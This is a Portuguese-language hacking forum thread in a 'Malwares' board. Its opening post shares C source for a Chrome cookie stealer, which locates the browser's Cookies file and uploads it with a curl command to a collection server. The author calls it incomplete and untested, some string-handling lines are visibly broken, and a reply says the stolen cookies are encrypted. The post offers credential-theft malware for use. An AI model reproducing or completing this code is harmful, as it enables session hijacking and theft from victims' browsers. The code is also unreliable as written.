[source] FTS steal cookies (chrome)

Postagem de conteúdo sobre malwares (trojan, keylogger, virus, backdoor)
Post Reply
User avatar
Kodo no Kami
Admin
Admin
Posts: 688
Joined: Fri Jan 02, 2015 1:56 pm
Contact:

[source] FTS steal cookies (chrome)

Post by Kodo no Kami » Thu Apr 09, 2015 4:30 pm

Code: Select all

/**
  coder: hfts315
	face: www.facebook.com/hacker.fts315
	greetz: mmxm, F.ramon, susp3it0virtu@l, member eof entre outros ^^
	obs: necessario o executavel curl, nem sei se funciona so fiz para passar o tempo kkkkkkk
**/
 
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
//#include <curl\curl.h>
 
//linha abaixo e o endereço do servidor com script que recebe o arquivo
//fiquei com preguiça de fazer ele
#define SERVIDOR "http://127.0.0.1/fts_spy.php"
#define CHROME_DIR "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
#define CMD "curl --upload-file "
 
int main(int argc, char **argv)
{
	char *home, *drive, *dir_chrome, *cmd;
	//CURL *curl;
	FILE *arq;
	int tam, tam2;
	home = getenv("HOMEPATH");
	drive = getenv("HOMEDRIVE");
	tam = strlen(home);
	tam += strlen(CHROME_DIR) + 1;
	dir_chrome = malloc(sizeof(char) * tam);
	strcat(dir_chrome,drive);
	strcat(dir_chrome,home);
	strcat(dir_chrome,CHROME_DIR);
	//arq = fopen(dir_chrome,"r"); //fiquei com preguiça de terminar com a
	//curl = curl_easy_init(); //api curl entao usei o system kkkkkkk
	tam2 = tam;
	tam2 += strlen(CMD);
	tam2 += strlen(dir_chrome);
	tam2 += strlen(SERVIDOR) + 12;
	cmd = malloc(sizeof(char) * tam2);
	strcpy(cmd,CMD);
	strcat(cmd," "");
	strcat(cmd,dir_chrome);
	strcat(cmd," "");
	strcat(cmd," --url ");
	strcat(cmd,SERVIDOR);
	system(cmd);
	return 0;
}
https://gist.github.com/hackerfts315/7032322

malware q envia cookie do navegador chrome para determinado servidor, porem ta bem incopleto fiquei com preguiça de terminar entao usei o system ao inves do modulo curl, nao testei pra v se funciona mais ta compilando tambem e necessario o exe curl XD
Image

que desagradavel ~ mirai kuriyama

Zaphod
Admin
Admin
Posts: 18
Joined: Fri Jan 02, 2015 1:24 pm

Re: [source] FTS steal cookies (chrome)

Post by Zaphod » Fri Apr 10, 2015 12:56 pm

Esse código copia o arquivo mas o conteúdo dos cookies é encriptado :/
+[----->+++<]>+.+.

Post Reply

Return to “Malwares”